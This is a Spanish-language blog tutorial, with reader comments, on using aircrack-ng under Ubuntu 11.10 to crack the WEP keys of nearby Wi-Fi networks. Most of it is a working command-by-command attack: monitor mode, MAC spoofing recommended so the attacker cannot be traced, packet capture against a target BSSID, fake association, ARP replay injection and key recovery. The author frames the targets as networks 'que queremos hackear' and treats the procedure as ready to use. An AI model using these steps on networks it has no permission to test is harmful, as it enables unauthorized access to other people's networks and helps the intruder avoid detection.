En este tutorial voy a mostrar como instalar y utilizar aircrack-ng en Ubuntu 11.10 para obtener claves WEP de wifi (Las de WPA lo mostraré más adelante)
Antes que nada tenemos que buscar en google acerca sobre nuestra tarjeta de red inalambrica ya que puede no ser compatible. Otra de las cosas por lo que aircrack es más eficiente en Linux es que este ofrece más soporte para las diferentes tarjetas de red que podemos encontrar.
Para poder conocer la compatibilidad de nuestra tarjeta hay que conocer la marca, modelo y chipset, que es de lo más importante. Las mejores tarjetas para auditorias de red son las Atheros.
Una vez revisado esto hay que instalar aircrack.
Si no tenemos Ubuntu ni una partición disponible para instalarlo Ubuntu puede ser instalado dentro de Windows, solo hay que descargar la imagen y montarla en alguna unidad virtual o CD y utilizar wubi.exe, ahi podremos seleccionar la cantidad de memoria en disco duro que le queremos asignar, nombre de usuario, idioma etc.
La imagen la podemos descargar en http://www.ubuntu.com/
y aquí en el blog encontrarán a su derecha manuales sobre como instalar Ubuntu
Ya en Ubuntu 11.10 lo primero que haremos es abrir una terminal y ponerla en modo root usando el comando
sudo su
e instalaremos aircrack utilizando el comando
apt-get install aircrack-ng
Como yo ya lo tengo instalado no me instaló nada |
En esta versión de Ubuntu hay un problema con aircrack y es necesario parchar los controladores,
para hacerlo creamos un arhivo de texto y pegamos lo siguiente
#!/bin/bash
sudo apt-get install -y linux-headers-$(uname -r) patch
wget http://www.orbit-lab.org/kernel/compat-wireless-3.0-stable/v3.0.0/compat-wireless-3.0-2.tar.bz2
tar -jxf compat-wireless-3.0-2.tar.bz2
cd compat-wireless-3.0-2/
wget http://patches.aircrack-ng.org/channel-negative-one-maxim.patch
patch ./net/wireless/chan.c channel-negative-one-maxim.patch
make
sudo make install
sudo make unload
sudo reboot
Después lo guardamos poniendole la extensión .sh (en mi caso fix.sh) y editamos los permisos para poder ejecutarlo como programa. Esto lo hacemos dándole click derecho > propiedades > permisos > ejecución.
Lo siguiente será ejecutar el archivo en una terminal haciendo doble click sobre el y selecionando esa opción.
Antes de realizar este paso hay que tener en mente que tardara alrededor de media hora y al terminar reiniciara el PC sin preguntar nada por lo que es recomendable no estar haciendo nada importante.
Ya realizado es hora de empezar, para ello abrimos una terminal, la ponemos en modo root (comando sudo su) y usamos el siguiente comando para poner nuestra tarjeta de red en modo monitor
airmon-ng start wlan0
Aquí podemos ver que el modo monitor se activa en mon0 en vez de wlan0
En mi PC wlan0 es mi tarjeta de red inalambrica, sin embargo en algunos casos puede cambiar, para saber cual es la interfaz inalambrica que queremos utilizar hay que utilizar el comando.
iwconfig
En caso de tratarse de otro dispositivo cambiaremos wlan0 por el correcto.
Aquí también podemos ver que la que está en modo monitor es mon0 y será la que utilizaremos de ahora en adelante
Un aspecto importante a la hora de crackear una contraseña es tomar en cuenta que pueden rastrearnos con nuestra dirección física (MAC) y lo más recomendable es cambiarla
Para ello instalaremos macchanger
apt-get install macchanger
y después para cambiarla utilizaremos los comandos
ifconfig mon0 down (Para desactivar mon0)
macchanger -m 00:11:22:33:44:55 mon0 (Para cambiar la MAC Donde 00:11:22:33:44:55 es la nueva MAC para nuestra interfaz y mon0 es la interfaz que estamos utilizando.)
ifconfig mon0 up (Para volver a activar mon0)
una vez cambiada vamos a utilizar el comando
airodump-ng mon0
Aquí podremos ver las redes que están al alcance de nuestra PC, lo que importa es copiar la dirección física (MAC) en canal (channel) y el nombre de la red
una vez que aparezcan presionamos ctrl + c para detenerlo y asi poder copiar los datos
Si la red que queremos hackear está en el canal 1 podemos omitir algunos pasos siguientes ya que el modo monitor inicia por default en el canal 1, si la red que queremos hackear está en otro canal hay que ejecutar el comando
airmon-ng stop mon0
para desactivar el modo monitor y luego para volver a activarlo usamos el comando
airmon-ng start wlan0 x
donde
x es el número del canal donde está la red que queremos hackear
Esta imagen demuestra como cambiar de canal, si la red a hackear está en el canal 1 omitir este paso |
Después de eso para ver la conexión de la PC con el AP y comenzar a capturar los paquetes hay que ingresar el comando
airodump-ng -c 1 -w apoloblog --bssid F4:55:9C:3C:7E:80 mon0
donde
-c es el canal de la red
-w es el nombre del archivo con el que queremos guardar los paquetes
--bssid es la dirección física de la red que queremos hackear(MAC)
mon0 es la interfaz de red que estamos utilizando
El siguiente paso es crear una asociación entre nuestra PC y el AP.
esto lo haremos abriendo una nueva terminal o pestaña de esta en modo root, e ingresando el comando
aireplay-ng -1 0 -e INFINITUM4691 -a 98:2C:BE:D8:E6:22 mon0
donde
-e es el nombre del AP o red
-a es la dirección física (MAC) de la red a hackear
mon0 es la interfaz de red que estamos utilizando
Después hay que comenzar a inyectar los paquetes y esto lo haremos con el comando
aireplay-ng -3 -b 98:2C:BE:D8:E6:22 -h 00:11:22:33:44:55 mon0
donde
-b es la direccion física mac de la red a hackear
mon0 es la interfaz de red que estamos utilizando
Es necesario juntar una gran cantidad de paquetes para poder crackear la clave, y el número depende de muchos factores, como el nivel de intensidad de la señal de la red, la complejidad de la clave y tambien la cantidad de datos que capturemos en los paquetes.
Después de un rato la cosa deberia verse masomenos así
Si sólo leemos paquetes (Read xxx packets) sin sent packets, acks ni arp lo mejor será reiniciar el proceso ya que no estamo capturando IV's y necesitamos alrededor de 20 000
Esto lo podemos ver donde dice DATA, en este caso van 3636 IV's,
También en la parde abajo podemos ver las asociaciones o clientes que están conectados al AP
Si nuestra mac se disocia (Se borra de la pantalla por un buen rato) podemos volver a usar el comando de asociación para mantener el ataque.
Otra combinación que me ha funcionado es comenzar primero la inyección de paquetes y luego asociar nuestra PC con el AP
La ventaja aquí es que podemos estar usando aircrack-ng para intentar obtener la clave sin la necesidad de parar el proceso de inyección de paquetes. Si no funciona podemos intentarlo más adelante.
Antes usar aircrack debemos tener unos 10 000 IV's o DATA
Luego usamos en otra pestaña o terminal el comando
ls
Ahí podremos ver la lista de archivos que hay en la carpeta y buscamos el nombre que decidimos usar en los primeros pasos cuando utilizamos -w
Es probable que cambie un poco el nombre por eso es bueno usar ls para ver cual es nuestro archivo.
Como podemos ver en el comando pusimos -w apoloblog, sin embargo el programa está guardando el archivo como apoloblog-01.cap, si ya habiamos utilizado apoloblog es probable que nuestro archivo se llame apoloblog-02.cap o 03 dependiendo de las veces que lo hayamos utilizado
Una vez bien ubicado vamos a utilizar el comando
aircrack-ng apoloblog-01.cap
donde
apoloblog-01.cap es el nombre que seleccionamos para el archivo de los paquetes
si aircrack-ng no logra desencriptar la clave nos dirá que intentemos con más IV's
pero si logra crackearla tendremos algo como lo siguiente
Podemos ver que logro hacerlo con 18000 IV's y esto llevo alrededor de 10 mins todo el proceso.
Claro que esto va a depender de muchos factores en cada red.
la clave aparece como 07:01:71:41:81
y para poder conectarnos sólo debemos poner 0701714181
Si se llegan a dar cuenta de que los horarios entre algunas terminales y el de la PC en la primera fase del tutorial es porque es algo largo ir tomando las fotos y lo hice en varios días, pero lo hice varias veces en diferentes redes y funcionó muy bien. Aunque es probable que en alguna ocasión fracasemos el proceso funciona perfectamente, sólo que la asociación puede dar problemas en especial cuando no tenemos buena señal, pero cuando hay buena señal todo debería ir perfectamente
cualquier cosa no duden en preguntar.
Cada dia me sorprendes mas tio, sigue asi :D
ResponderEliminarMuchas gracias, da gusto saber que por lo menos alguien mira el blog y comentarios así me motivan a seguir n.n
ResponderEliminarme gusta mucho tu blog, gracias por hacerlo :D
EliminarPD: al poner contraseña me dice incorrecta y es la correcta
Gracias :) y no entiendo, al poner la contraseña donde?
Eliminarsalu2
arriba del todo, en la primera imagen, hay que poner contraseña
EliminarLos tutoriales son muy interesantes y están muy bien explicados :)
ResponderEliminarGood Job!
Muchas gracias :)
Eliminarque tal queria ver algo como esto de explicado despues te comunico si me sirve
ResponderEliminarmmmm ok todo esta muy bien pero cual es el programa qe tengo qe descargar o qe?? o.o
ResponderEliminarSe llama aircrack-ng funciona para distribuciones en linux :)
EliminarTodo esta perfecto, pero yo estava informado de algun tipo de comando que asia el proceso de captura de datos mucho mas rapido...
ResponderEliminarcapturavas cerca de 30,000 paquetes por min. y mi pregunta es si saver como aserlo??
oye me dices como quitar los virus a mi compu :o tengo muchos
ResponderEliminar